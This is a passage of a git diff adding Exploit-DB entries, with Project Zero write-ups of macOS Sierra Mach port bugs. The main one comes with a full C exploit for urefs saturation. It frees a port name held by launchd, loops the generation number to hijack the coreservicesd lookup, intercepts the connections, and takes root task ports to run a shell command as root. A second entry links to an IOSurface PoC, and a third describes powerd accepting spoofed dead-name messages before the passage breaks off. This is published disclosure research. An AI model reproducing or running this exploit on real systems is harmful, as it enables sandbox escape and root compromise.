reference count from becoming incorrect but rather because +at (2) if the urefs count wasn't capped the reference count would overflow the 16-bit bitfield into the capability bits. + +The issue is that the urefs count isn't "pegged" at all. I would expect "pegged" to mean that the urefs count will now stay at 0xfffe +and cannot be decremented - leaking the name and associated ipc_object but avoiding the possibilty of a name being over-released. + +In fact all that the "peg" does is prevent the urefs count from exceeding 0xfffe; it doesn't prevent userspace from believing +it has more urefs than that (by eg making the copyout's fail.) + +What does this actually mean? + +Let's consider the behaviour of mach_msg_server or dispatch_mig_server. 
They receive mach service messages in a loop and if the message +they receieved didn't corrispond to the MIG schema they pass that received message to mach_msg_destroy. Here's the code where mach_msg_destroy +destroys an ool_ports_descriptor_t: + + case MACH_MSG_OOL_PORTS_DESCRIPTOR : { + mach_port_t *ports; + mach_msg_ool_ports_descriptor_t *dsc; + mach_msg_type_number_t j; + + /* + * Destroy port rights carried in the message + */ + dsc = &saddr->ool_ports; + ports = (mach_port_t *) dsc->address; + for (j = 0; j < dsc->count; j++, ports++) { + mach_msg_destroy_port(*ports, dsc->disposition); // calls mach_port_deallocate + } + ... + +This will call mach_port_deallocate for each ool_port name received. + +If we send such a service a mach message with eg 0x20000 copies of the same port right as ool ports the ipc_entry for that name will actually only have +0xfffe urefs. After 0xfffe calls to mach_port_deallocate the urefs will hit 0 and the kernel will free the ipc_entry and mark that name as free. From this +point on the name can be re-used to name another right (for example by sending another message received on another thread) but the first thread will +still call mach_port_deallocate 0x10002 times on that name. + +This leads to something like a use-after-deallocate of the mach port name - strictly a userspace bug (there's no kernel memory corruption etc here) but +caused by a kernel bug. + +** Doing something interesting ** + +Here's one example of how this bug could be used to elevate privileges/escape from sandboxes: + +All processes have send rights to the bootstrap server (launchd). When they wish to lookup a service they send messages to this port. + +Process A and B run as the same user; A is sandboxed, B isn't. B implements a mach service and A has looked up a send right to the service vended by +B via launchd. + +Process A builds a mach message with 0x10000 ool send rights to the bootstrap server and sends this message to B. 
B receives the message inside mach_msg_server +(or a similar function.) When the kernel copies out this message to process B it sees that B already has a name for the boostrap port so increments the urefs count +for that name for each ool port in the message - there are 0x10000 of those but the urefs count stops incrementing at 0xfffe (but the copy outs still succeed and +process B sees 0x10000 copies of the same name in the received ool ports descriptor.) + +Process B sees that the message doesn't match its MIG schema and passes it to mach_msg_destroy, which calls mach_port_deallocate 0x10000 times, destroying the rights +carried in the ool ports; since the bootstrap_port name only has 0xfffe urefs after the 0xfffe'th mach_port_deallocate this actually frees the boostrap_port's +name in process B meaning that it can be reused to name another port right. The important thing to notice here is that process B still believes that the name names +a send right to launchd (and it will just read the name from the bootstrap_port global variable.) + +Process A can then allocate new mach port receive rights and send another message containing send rights to these new ports to process B and try to get the old name +reused to name one of these send rights - now when process B tries to communicate with launchd it will instead be communicating with process A. + +Turning this into code execution outside of the sandbox would depend on what you could transativly do by impersonating launchd in such a fashion but it's surely possible. + +Another approach with a more clear path to code execution would be to replace the IOKit master device port using the same technique - there's then a short path to getting +the target's task port if it tries to open a new IOKit user client since it will pass its task port to io_service_open_extended. 
+ +** poc ** + +This PoC just demonstrates the ability to cause the boostrap port name to be freed in another process - this should be proof enough that there's a very serious bug here. + +Use a kernel debugger and showtaskrights to see that sharingd's name for the bootstrap port has been freed but that in userspace the bootstrap_port global is still the old name. + +I will work on a full exploit but it's a non-trivial task! Please reach out to me ASAP if you require any futher information about the impact of this bug. + +Tested on MacOS Sierra 10.12 (16A323) + +################################################################################ + +Exploit attached :) + +The challenge to exploiting this bug is getting the exact same port name reused +in an interesting way. + +This requires us to dig in a bit to exacly what a port name is, how they're allocated +and under what circumstances they'll be reused. + +Mach ports are stored in a flat array of ipc_entrys: + + struct ipc_entry { + struct ipc_object *ie_object; + ipc_entry_bits_t ie_bits; + mach_port_index_t ie_index; + union { + mach_port_index_t next; /* next in freelist, or... */ + ipc_table_index_t request; /* dead name request notify */ + } index; + }; + +mach port names are made up of two fields, the upper 24 bits are an index into the ipc_entrys table +and the lower 8 bits are a generation number. Each time an entry in the ipc_entrys table is reused +the generation number is incremented. There are 64 generations, so after an entry has been reallocated +64 times it will have the same generation number. + +The generation number is checked in ipc_entry_lookup: + + if (index < space->is_table_size) { + entry = &space->is_table[index]; + if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) || + IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) + entry = IE_NULL; + } + +here entry is the ipc_entry struct in the kernel and name is the user-supplied mach port name. 
+ +Entry allocation: +The ipc_entry table maintains a simple LIFO free list for entries; if this list is free the table will +be grown. The table is never shrunk. + +Reliably looping mach port names: +To exploit this bug we need a primitive that allows us to loop a mach port's generation number around. + +After triggering the urefs bug to free the target mach port name in the target process we immediately +send a message with N ool ports (with send rights) and no reply port. Since the target port was the most recently +freed it will be at the head of the freelist and will be reused to name the first of the ool ports +contained in the message (but with an incremented generation number.) +Since this message is not expected by the service (in this case we send an +invalid XPC request to launchd) it will get passed to mach_msg_destroy which will pass each of +the ports to mach_port_deallocate freeing them in the order in which they appear in the message. Since the +freed port was reused to name the first ool port it will be the first to be freed. This will push the name +N entries down the freelist. + +We then send another 62 of these looper messages but with 2N ool ports. This has the effect of looping the generation +number of the target port around while leaving it in approximately the middle of the freelist. The next time the target entry +in the table is allocated it will have exactly the same mach port name as the original target right we +triggered the urefs bug on. + +For this PoC I target the send right to com.apple.CoreServices.coreservicesd which launchd has. + +I look up the coreservicesd service in launchd then use the urefs bug to free launchd's send right and use the +looper messages to spin the generation number round. I then register a large number of dummy services +with launchd so that one of them reuses the same mach port name as launchd thinks the coreservicesd service has. 
+ +Now when any process looks up com.apple.CoreServices.coreservicesd launchd will actually send them a send right +to one of my dummy services :) + +I add all those dummy services to a portset and use that recieve right and the legitimate coreservicesd send right +I still have to MITM all these new connections to coreservicesd. I look up a few root services which send their +task ports to coreservices and grab these task ports in the mitm and start a new thread in the uid 0 process to run a shell command as root :) + +The whole flow seems to work about 50% of the time. +*/ + +// ianbeer +// build: clang -o service_mitm service_mitm.c + +#if 0 +Exploit for the urefs saturation bug + +The challenge to exploiting this bug is getting the exact same port name reused +in an interesting way. + +This requires us to dig in a bit to exacly what a port name is, how they're allocated +and under what circumstances they'll be reused. + +Mach ports are stored in a flat array of ipc_entrys: + + struct ipc_entry { + struct ipc_object *ie_object; + ipc_entry_bits_t ie_bits; + mach_port_index_t ie_index; + union { + mach_port_index_t next; /* next in freelist, or... */ + ipc_table_index_t request; /* dead name request notify */ + } index; + }; + +mach port names are made up of two fields, the upper 24 bits are an index into the ipc_entrys table +and the lower 8 bits are a generation number. Each time an entry in the ipc_entrys table is reused +the generation number is incremented. There are 64 generations, so after an entry has been reallocated +64 times it will have the same generation number. + +The generation number is checked in ipc_entry_lookup: + + if (index < space->is_table_size) { + entry = &space->is_table[index]; + if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) || + IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) + entry = IE_NULL; + } + +here entry is the ipc_entry struct in the kernel and name is the user-supplied mach port name. 
+ +Entry allocation: +The ipc_entry table maintains a simple LIFO free list for entries; if this list is free the table will +be grown. The table is never shrunk. + +Reliably looping mach port names: +To exploit this bug we need a primitive that allows us to loop a mach port's generation number around. + +After triggering the urefs bug to free the target mach port name in the target process we immediately +send a message with N ool ports (with send rights) and no reply port. Since the target port was the most recently +freed it will be at the head of the freelist and will be reused to name the first of the ool ports +contained in the message (but with an incremented generation number.) +Since this message is not expected by the service (in this case we send an +invalid XPC request to launchd) it will get passed to mach_msg_destroy which will pass each of +the ports to mach_port_deallocate freeing them in the order in which they appear in the message. Since the +freed port was reused to name the first ool port it will be the first to be freed. This will push the name +N entries down the freelist. + +We then send another 62 of these looper messages but with 2N ool ports. This has the effect of looping the generation +number of the target port around while leaving it in approximately the middle of the freelist. The next time the target entry +in the table is allocated it will have exactly the same mach port name as the original target right we +triggered the urefs bug on. + +For this PoC I target the send right to com.apple.CoreServices.coreservicesd which launchd has. + +I look up the coreservicesd service in launchd then use the urefs bug to free launchd's send right and use the +looper messages to spin the generation number round. I then register a large number of dummy services +with launchd so that one of them reuses the same mach port name as launchd thinks the coreservicesd service has. 
+ +Now when any process looks up com.apple.CoreServices.coreservicesd launchd will actually send them a send right +to one of my dummy services :) + +I add all those dummy services to a portset and use that recieve right and the legitimate coreservicesd send right +I still have to MITM all these new connections to coreservicesd. I look up a few root services which send their +task ports to coreservices and grab these task ports in the mitm and start a new thread in the uid 0 process to run a shell command as root :) + +The whole flow seems to work about 50% of the time. +#endif + +#include +#include +#include +#include +#include + +#include +#include +#include + +void run_command(mach_port_t target_task, char* command) { + kern_return_t err; + + size_t command_length = strlen(command) + 1; + size_t command_page_length = ((command_length + 0xfff) >> 12) << 12; + command_page_length += 1; // for the stack + + // allocate some memory in the task + mach_vm_address_t command_addr = 0; + err = mach_vm_allocate(target_task, + &command_addr, + command_page_length, + VM_FLAGS_ANYWHERE); + + if (err != KERN_SUCCESS) { + printf("mach_vm_allocate: %s\n", mach_error_string(err)); + return; + } + + printf("allocated command at %llx\n", command_addr); + uint64_t bin_bash = command_addr; + uint64_t dash_c = command_addr + 0x10; + uint64_t cmd = command_addr + 0x20; + uint64_t argv = command_addr + 0x800; + + uint64_t argv_contents[] = {bin_bash, dash_c, cmd, 0}; + + err = mach_vm_write(target_task, + bin_bash, + (mach_vm_offset_t)"/bin/bash", + strlen("/bin/bash") + 1); + + err = mach_vm_write(target_task, + dash_c, + (mach_vm_offset_t)"-c", + strlen("-c") + 1); + + err = mach_vm_write(target_task, + cmd, + (mach_vm_offset_t)command, + strlen(command) + 1); + + err = mach_vm_write(target_task, + argv, + (mach_vm_offset_t)argv_contents, + sizeof(argv_contents)); + + if (err != KERN_SUCCESS) { + printf("mach_vm_write: %s\n", mach_error_string(err)); + return; + } + + // create a new 
thread: + mach_port_t new_thread = MACH_PORT_NULL; + x86_thread_state64_t state; + mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT; + + memset(&state, 0, sizeof(state)); + + // the minimal register state we require: + state.__rip = (uint64_t)execve; + state.__rdi = (uint64_t)bin_bash; + state.__rsi = (uint64_t)argv; + state.__rdx = (uint64_t)0; + + err = thread_create_running(target_task, + x86_THREAD_STATE64, + (thread_state_t)&state, + stateCount, + &new_thread); + + if (err != KERN_SUCCESS) { + printf("thread_create_running: %s\n", mach_error_string(err)); + return; + } + + printf("done?\n"); +} + + +mach_port_t lookup(char* name) { + mach_port_t service_port = MACH_PORT_NULL; + kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port); + if(err != KERN_SUCCESS){ + printf("unable to look up %s\n", name); + return MACH_PORT_NULL; + } + + if (service_port == MACH_PORT_NULL) { + printf("bad service port\n"); + return MACH_PORT_NULL; + } + return service_port; +} + +/* +host_service is the service which is hosting the port we want to free (eg the bootstrap port) +target_port is a send-right to the port we want to get free'd in the host service (eg another service port in launchd) +*/ + +struct ool_msg { + mach_msg_header_t hdr; + mach_msg_body_t body; + mach_msg_ool_ports_descriptor_t ool_ports; +}; + +// this msgh_id is an XPC message +uint32_t msgh_id_to_get_destroyed = 0x10000000; + +void do_free(mach_port_t host_service, mach_port_t target_port) { + kern_return_t err; + + int port_count = 0x10000; + mach_port_t* ports = malloc(port_count * sizeof(mach_port_t)); + for (int i = 0; i < port_count; i++) { + ports[i] = target_port; + } + + // build the message to free the target port name + struct ool_msg* free_msg = malloc(sizeof(struct ool_msg)); + memset(free_msg, 0, sizeof(struct ool_msg)); + + free_msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + free_msg->hdr.msgh_size = sizeof(struct 
ool_msg); + free_msg->hdr.msgh_remote_port = host_service; + free_msg->hdr.msgh_local_port = MACH_PORT_NULL; + free_msg->hdr.msgh_id = msgh_id_to_get_destroyed; + + free_msg->body.msgh_descriptor_count = 1; + + free_msg->ool_ports.address = ports; + free_msg->ool_ports.count = port_count; + free_msg->ool_ports.deallocate = 0; + free_msg->ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND; + free_msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + free_msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY; + + // send the free message + err = mach_msg(&free_msg->hdr, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + (mach_msg_size_t)sizeof(struct ool_msg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + printf("free message: %s\n", mach_error_string(err)); +} + +void send_looper(mach_port_t service, mach_port_t* ports, uint32_t n_ports, int disposition) { + kern_return_t err; + struct ool_msg msg = {0}; + msg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX; + msg.hdr.msgh_size = sizeof(msg); + msg.hdr.msgh_remote_port = service; + msg.hdr.msgh_local_port = MACH_PORT_NULL; + msg.hdr.msgh_id = msgh_id_to_get_destroyed; + + msg.body.msgh_descriptor_count = 1; + + msg.ool_ports.address = (void*)ports; + msg.ool_ports.count = n_ports; + msg.ool_ports.disposition = disposition; + msg.ool_ports.deallocate = 0; + msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + + err = mach_msg(&msg.hdr, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + (mach_msg_size_t)sizeof(struct ool_msg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + printf("sending looper: %s\n", mach_error_string(err)); + + // need to wait a little bit since we don't send a reply port and don't want to fill the queue + usleep(100); +} + +mach_port_right_t right_fixup(mach_port_right_t in) { + switch (in) { + case MACH_MSG_TYPE_PORT_SEND: + return MACH_MSG_TYPE_MOVE_SEND; + case MACH_MSG_TYPE_PORT_SEND_ONCE: + return MACH_MSG_TYPE_MOVE_SEND_ONCE; + case 
MACH_MSG_TYPE_PORT_RECEIVE: + return MACH_MSG_TYPE_MOVE_RECEIVE; + default: + return 0; // no rights + } +} + +int ran_command = 0; + +void inspect_port(mach_port_t port) { + pid_t pid = 0; + pid_for_task(port, &pid); + if (pid != 0) { + printf("got task port for pid: %d\n", pid); + } + // find the uid + int proc_err; + struct proc_bsdshortinfo info = {0}; + proc_err = proc_pidinfo(pid, PROC_PIDT_SHORTBSDINFO, 0, &info, sizeof(info)); + if (proc_err <= 0) { + // fail + printf("proc_pidinfo failed\n"); + return; + } + + if (info.pbsi_uid == 0) { + printf("got r00t!! ******************\n"); + printf("(via task port for: %s)\n", info.pbsi_comm); + if (!ran_command) { + run_command(port, "echo hello > /tmp/hello_from_root"); + ran_command = 1; + } + } + + return; +} + +/* +implements the mitm +replacer_portset contains receive rights for all the ports we send to launchd +to replace the real service port + +real_service_port is a send-right to the actual service + +receive messages on replacer_portset, inspect them, then fix them up and send them along +to the real service +*/ +void do_service_mitm(mach_port_t real_service_port, mach_port_t replacer_portset) { + size_t max_request_size = 0x10000; + mach_msg_header_t* request = malloc(max_request_size); + + for(;;) { + memset(request, 0, max_request_size); + kern_return_t err = mach_msg(request, + MACH_RCV_MSG | + MACH_RCV_LARGE, // leave larger messages in the queue + 0, + max_request_size, + replacer_portset, + 0, + 0); + + if (err == MACH_RCV_TOO_LARGE) { + // bump up the buffer size + mach_msg_size_t new_size = request->msgh_size + 0x1000; + request = realloc(request, new_size); + // try to receive again + continue; + } + + if (err != KERN_SUCCESS) { + printf("error receiving on port set: %s\n", mach_error_string(err)); + exit(EXIT_FAILURE); + } + + printf("got a request, fixing it up...\n"); + + // fix up the message such that it can be forwarded: + + // get the rights we were sent for each port the header + 
mach_port_right_t remote = MACH_MSGH_BITS_REMOTE(request->msgh_bits); + mach_port_right_t voucher = MACH_MSGH_BITS_VOUCHER(request->msgh_bits); + + // fixup the header ports: + // swap the remote port we received into the local port we'll forward + // this means we're only mitm'ing in one direction - we could also + // intercept these replies if necessary + request->msgh_local_port = request->msgh_remote_port; + request->msgh_remote_port = real_service_port; + // voucher port stays the same + + int is_complex = MACH_MSGH_BITS_IS_COMPLEX(request->msgh_bits); + + // (remote, local, voucher) + request->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, right_fixup(remote), right_fixup(voucher)); + + if (is_complex) { + request->msgh_bits |= MACH_MSGH_BITS_COMPLEX; + + // if it's complex we also need to fixup all the descriptors... + mach_msg_body_t* body = (mach_msg_body_t*)(request+1); + mach_msg_type_descriptor_t* desc = (mach_msg_type_descriptor_t*)(body+1); + for (mach_msg_size_t i = 0; i < body->msgh_descriptor_count; i++) { + switch (desc->type) { + case MACH_MSG_PORT_DESCRIPTOR: { + mach_msg_port_descriptor_t* port_desc = (mach_msg_port_descriptor_t*)desc; + inspect_port(port_desc->name); + port_desc->disposition = right_fixup(port_desc->disposition); + desc = (mach_msg_type_descriptor_t*)(port_desc+1); + break; + } + case MACH_MSG_OOL_DESCRIPTOR: { + mach_msg_ool_descriptor_t* ool_desc = (mach_msg_ool_descriptor_t*)desc; + // make sure that deallocate is true; we don't want to keep this memory: + ool_desc->deallocate = 1; + desc = (mach_msg_type_descriptor_t*)(ool_desc+1); + break; + } + case MACH_MSG_OOL_VOLATILE_DESCRIPTOR: + case MACH_MSG_OOL_PORTS_DESCRIPTOR: { + mach_msg_ool_ports_descriptor_t* ool_ports_desc = (mach_msg_ool_ports_descriptor_t*)desc; + // make sure that deallocate is true: + ool_ports_desc->deallocate = 1; + ool_ports_desc->disposition = right_fixup(ool_ports_desc->disposition); + desc = 
(mach_msg_type_descriptor_t*)(ool_ports_desc+1); + break; + } + } + } + + } + + printf("fixed up request, forwarding it\n"); + + // forward the message: + err = mach_msg(request, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + request->msgh_size, + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + + if (err != KERN_SUCCESS) { + printf("error forwarding service message: %s\n", mach_error_string(err)); + exit(EXIT_FAILURE); + } + } + +} + +void lookup_and_ping_service(char* name) { + mach_port_t service_port = lookup(name); + if (service_port == MACH_PORT_NULL) { + printf("failed too lookup %s\n", name); + return; + } + // send a ping message to make sure the service actually gets launched: + kern_return_t err; + mach_msg_header_t basic_msg; + + basic_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + basic_msg.msgh_size = sizeof(basic_msg); + basic_msg.msgh_remote_port = service_port; + basic_msg.msgh_local_port = MACH_PORT_NULL; + basic_msg.msgh_reserved = 0; + basic_msg.msgh_id = 0x41414141; + + err = mach_msg(&basic_msg, + MACH_SEND_MSG, + sizeof(basic_msg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + if (err != KERN_SUCCESS) { + printf("failed to send ping message to service %s (err: %s)\n", name, mach_error_string(err)); + return; + } + + printf("pinged %s\n", name); +} + +void* do_lookups(void* arg) { + lookup_and_ping_service("com.apple.storeaccountd"); + lookup_and_ping_service("com.apple.hidfud"); + lookup_and_ping_service("com.apple.netauth.sys.gui"); + lookup_and_ping_service("com.apple.netauth.user.gui"); + lookup_and_ping_service("com.apple.avbdeviced"); + return NULL; +} + +void start_root_lookups_thread() { + pthread_t thread; + pthread_create(&thread, NULL, do_lookups, NULL); +} + +char* default_target_service_name = "com.apple.CoreServices.coreservicesd"; + +int main(int argc, char** argv) { + char* target_service_name = default_target_service_name; + if (argc > 1) { + target_service_name = argv[1]; + } + 
+ // allocate the receive rights which we will try to replace the service with: + // (we'll also use them to loop the mach port name in the target) + size_t n_ports = 0x1000; + mach_port_t* ports = calloc(sizeof(void*), n_ports); + for (int i = 0; i < n_ports; i++) { + kern_return_t err; + err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); + if (err != KERN_SUCCESS) { + printf("failed to allocate port: %s\n", mach_error_string(err)); + exit(EXIT_FAILURE); + } + err = mach_port_insert_right(mach_task_self(), + ports[i], + ports[i], + MACH_MSG_TYPE_MAKE_SEND); + if (err != KERN_SUCCESS) { + printf("failed to insert send right: %s\n", mach_error_string(err)); + exit(EXIT_FAILURE); + } + } + + // generate some service names we can use: + char** names = calloc(sizeof(char*), n_ports); + for (int i = 0; i < n_ports; i++) { + char name[64]; + sprintf(name, "replacer.%d", i); + names[i] = strdup(name); + } + + // lookup a send right to the target to be replaced + mach_port_t target_service = lookup(target_service_name); + + // free the target in launchd + do_free(bootstrap_port, target_service); + + // send one smaller looper message to push the free'd name down the free list: + send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND); + + // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist + for (int i = 0; i < 62; i++) { + send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND); + } + + // now that the name should have looped round (and still be near the middle of the freelist + // try to replace it by registering a lot of new services + for (int i = 0; i < n_ports; i++) { + kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]); + if (err != KERN_SUCCESS) { + printf("failed to register service %d, continuing anyway...\n", i); + } + } + + // add all those receive rights to a port set: + mach_port_t ps; + mach_port_allocate(mach_task_self(), 
MACH_PORT_RIGHT_PORT_SET, &ps); + for (int i = 0; i < n_ports; i++) { + mach_port_move_member(mach_task_self(), ports[i], ps); + } + + start_root_lookups_thread(); + + do_service_mitm(target_service, ps); + return 0; +} \ No newline at end of file diff --git a/platforms/multiple/dos/40955.txt b/platforms/multiple/dos/40955.txt new file mode 100755 index 000000000..97bdd40fb --- /dev/null +++ b/platforms/multiple/dos/40955.txt @@ -0,0 +1,17 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930 + +IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return +kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via +IOConnectCallAsyncMethod. + +If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that +they did take ownership and won't release it's reference on the port. This leads to a reference count leak. + +See the previous bug for more in-depth discussion. + +This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable. +This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40955.zip diff --git a/platforms/multiple/dos/40958.c b/platforms/multiple/dos/40958.c new file mode 100755 index 000000000..94550a69d --- /dev/null +++ b/platforms/multiple/dos/40958.c 
@@ -0,0 +1,263 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976 + +powerd (running as root) hosts the com.apple.PowerManagement.control mach service. + +It checks in with launchd to get a server port and then wraps that in a CFPort: + + pmServerMachPort = _SC_CFMachPortCreateWithPort( + "PowerManagement", + serverPort, + mig_server_callback, + &context); + +It also asks to receive dead name notifications for other ports on that same server port: + + mach_port_request_notification( + mach_task_self(), // task + notify_port_in, // port that will die + MACH_NOTIFY_DEAD_NAME, // msgid + 1, // make-send count + CFMachPortGetPort(pmServerMachPort), // notify port + MACH_MSG_TYPE_MAKE_SEND_ONCE, // notifyPoly + &oldNotify); // previous + +mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort: + + static void + mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info) + { + mig_reply_error_t * bufRequest = msg; + mig_reply_error_t * bufReply = CFAllocatorAllocate( + NULL, _powermanagement_subsystem.maxsize, 0); + mach_msg_return_t mr; + int options; + + __MACH_PORT_DEBUG(true, "mig_server_callback", serverPort); + + /* we have a request message */ + (void) pm_mig_demux(&bufRequest->Head, &bufReply->Head); + +This passes the raw message to pm_mig_demux: + + static boolean_t + pm_mig_demux( + mach_msg_header_t * request, + mach_msg_header_t * reply) + { + mach_dead_name_notification_t *deadRequest = + (mach_dead_name_notification_t *)request; + boolean_t processed = FALSE; + + processed = powermanagement_server(request, reply); + + if (processed) + return true; + + if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) + { + __MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port); + + PMConnectionHandleDeadName(deadRequest->not_port); + + __MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port); 
+ mach_port_deallocate(mach_task_self(), deadRequest->not_port); + + reply->msgh_bits = 0; + reply->msgh_remote_port = MACH_PORT_NULL; + + return TRUE; + } + +This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't +match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME. + +deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h: + + typedef struct { + mach_msg_header_t not_header; + NDR_record_t NDR; + mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */ + mach_msg_format_0_trailer_t trailer; + } mach_dead_name_notification_t; + +This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to +mach_port_deallocate. + +The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process +to drop a reference on a controlled mach port name :) + +Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent +user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port. + +You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right. + +Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the +mach_port_deallocate call and you'll see the controlled value in rsi. + +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) + */ + +// ianbeer + +#if 0 +MacOS/iOS arbitrary port replacement in powerd + +powerd (running as root) hosts the com.apple.PowerManagement.control mach service. 
+ +It checks in with launchd to get a server port and then wraps that in a CFPort: + + pmServerMachPort = _SC_CFMachPortCreateWithPort( + "PowerManagement", + serverPort, + mig_server_callback, + &context); + +It also asks to receive dead name notifications for other ports on that same server port: + + mach_port_request_notification( + mach_task_self(), // task + notify_port_in, // port that will die + MACH_NOTIFY_DEAD_NAME, // msgid + 1, // make-send count + CFMachPortGetPort(pmServerMachPort), // notify port + MACH_MSG_TYPE_MAKE_SEND_ONCE, // notifyPoly + &oldNotify); // previous + +mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort: + + static void + mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info) + { + mig_reply_error_t * bufRequest = msg; + mig_reply_error_t * bufReply = CFAllocatorAllocate( + NULL, _powermanagement_subsystem.maxsize, 0); + mach_msg_return_t mr; + int options; + + __MACH_PORT_DEBUG(true, "mig_server_callback", serverPort); + + /* we have a request message */ + (void) pm_mig_demux(&bufRequest->Head, &bufReply->Head); + +This passes the raw message to pm_mig_demux: + + static boolean_t + pm_mig_demux( + mach_msg_header_t * request, + mach_msg_header_t * reply) + { + mach_dead_name_notification_t *deadRequest = + (mach_dead_name_notification_t *)request; + boolean_t processed = FALSE; + + processed = powermanagement_server(request, reply); + + if (processed) + return true; + + if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) + { + __MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port); + + PMConnectionHandleDeadName(deadRequest->not_port); + + __MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port); + mach_port_deallocate(mach_task_self(), deadRequest->not_port); + + reply->msgh_bits = 0; + reply->msgh_remote_port = MACH_PORT_NULL; + + return TRUE; + } + +This passes the 
message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't +match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME. + +deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h: + + typedef struct { + mach_msg_header_t not_header; + NDR_record_t NDR; + mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */ + mach_msg_format_0_trailer_t trailer; + } mach_dead_name_notification_t; + +This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to +mach_port_deallocate. + +The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process +to drop a reference on a controlled mach port name :) + +Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent +user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port. + +You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right. + +Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the +mach_port_deallocate call and you'll see the controlled value in rsi. 
